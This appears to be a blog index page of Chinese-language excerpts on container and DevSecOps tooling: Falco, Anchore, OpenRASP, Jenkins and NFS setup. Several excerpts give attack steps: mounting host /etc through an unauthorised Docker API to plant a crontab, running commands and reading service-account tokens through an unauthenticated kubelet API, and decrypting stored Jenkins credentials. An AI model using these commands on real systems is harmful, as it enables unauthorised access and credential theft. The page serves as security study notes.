zj1244

## 部署 使用helm部署falco，推荐把日志格式化成json，这样日志信息会比较详细 ``` # helm install --name falco --set ebpf.enabled=true,falco.jsonOutput=true,set image.tag=0.22.0 stable/falco ``` 从集群删除 ``` # helm delete --purge falco ``` 出现CrashLoopBackOff可能是内核不匹配  检查日志进一步确认是不是内核问题  升级目标节点内核后重启，问题解决 ``` yum install...

1、命令如下： ``` # curl https://docs.anchore.com/current/docs/engine/quickstart/docker-compose.yaml > docker-compose.yaml # docker-compose up -d ``` 2、查看部署是否成功： ``` # docker-compose ps Name Command State Ports -------------------------------------------------------------------------------------- root_analyzer_1 /docker-entrypoint.sh anch ... Up 8228/tcp root_api_1 /docker-entrypoint.sh...

## docker未授权攻击步骤 没什么好说的，和redis的利用方式很像 * 方式一 ``` # docker -H tcp://ip:2375 run -it -v /etc:/mnt centos /bin/bash # cp /mnt/crontab /mnt/crontab.bak # echo -e "* * * * * root bash...

## 环境要求 首先需要三个数据库，mysql、Elasticsearch和MongoDB，es用来存储报警和统计信息，mongo用来存储应用、账号密码等信息。 目前对数据库的要求是： * MongoDB版本大于等于3.6 * ElasticSearch版本大于等于5.6，小于7.0 ## 添加mongo用户 mongodb和es安装过程省略，测试可以用docker ``` > use openrasp > db.createUser({user:'iast',pwd:'123456', roles:["readWrite", "dbAdmin"]}) ``` ## 安装管理后台 ``` # wget https://packages.baidu.com/app/openrasp/release/1.3.2/rasp-cloud.tar.gz # tar -zxvf rasp-cloud.tar.gz...

1、确定主机是否可以利用，访问`https://ip:10250/pods`，出现如下数据表示可以利用：  2、执行【curl -k -XPOST "https://k8s-node-1:10250/run/%namespace%/%pod_name%/%container_name%" -d "cmd=ls -la /"】，即可执行命令：  3、现在问题变成了如何确定namespace、pod_name、container_name，访问`https://ip:10250/pods`，并查找selfLink，会有一个类似【/api/v1/namespaces/test1/pods/web-docker-594dd9789f-fc9d9】的值，其中namespaces就是后面的test1，同理pods就是后面的web-docker-594dd9789f-fc9d9。如果执行失败，可以看看phase的状态是不是fail，是的话就换一个phase是running的再试试。  4、获得token，`curl -k -XPOST "https://ip:10250/run/cattle-system/cattle-cluster-agent-549fc45d6f-lf7hp/cluster-register" -d "cmd=cat /var/run/secrets/kubernetes.io/serviceaccount/token"`   5、如果不在这个位置，可用mount命令来查找：  6、接下来可以尝试获得master（api server）的权限，默认情况下，api server开发的端口为6443，所以扫描同个网段开放6443的主机来挨个尝试，除了这种方法，还可以尝试执行env命令来查看是否有api server的地址或者其他敏感信息：  7、执行命令`kubectl...

## 前提 需要可以执行script ## 获得加密后的凭据 通过访问凭据->系统->全局凭据->某个凭据->更新来查看加密后的凭据  ## 解密 点击系统管理->命令脚本行，输入如下代码，即可查看密码 ``` println(hudson.util.Secret.fromString('xxxxxxxxxxxxxxxxxxxx').getPlainText()) ``` 或者 ``` println(hudson.util.Secret.decrypt("xxxxxxxxxxxxxxx")) ```  参考： https://fortynorthsecurity.com/blog/the-security-of-devsecops-jenkins/

## 常用命令 * 查看policy情况 ``` # anchore-cli --u admin --p 123 --url http://192.168.47.123:31050/v1 policy list ``` * 激活策略，需要激活才能在jenkins上体现出来 ``` # anchore-cli --u admin --p 123 --url http://192.168.47.123:31050/v1 policy activate policy-check-env...

### 安装nfs服务 ``` yum install -y nfs-utils ``` ### 设置nfs目录 ``` # cat /etc/exports /data/ *(rw,sync,no_root_squash,no_all_squash) ``` ### nfs-client-deployment.yaml ``` #ServiceAccount --- apiVersion: v1 kind: ServiceAccount metadata: name: nfs-client-provisioner #rbac...

### 1.新建job 新建个自由风格的任务，任务名为test  ### 2. 安装Gogs插件 打开 系统管理 -> 管理插件 -> 可选插件，在右上角输入框中输入"gogs"来筛选插件  ### 3. 添加web钩子 进入仓库，这里使用的是gogs。然后点击【仓库设置】->【管理Web钩子】->【添加Web钩子】-> 【Gogs】  ### 4. 设置web钩子 需要注意的是job=test中的test是jenkins里的任务名，需要一一对应，不能填错。  ### 5. 安装Publish over ssh插件...

### 背景 官方的部署方案不完整，会因为没有为postgres设置pv而导致部署失败，而官方文档也没有提醒需要自己建立pv。 ### 安装条件 - 安装了helm - 安装了Tiller - 安装了k8s - 需要20g空间给数据库使用 ### 安装 1、更新Helm Charts仓库 ``` [root@sec-infoanalysis2-test ops]# helm repo update Hang tight while we grab the latest...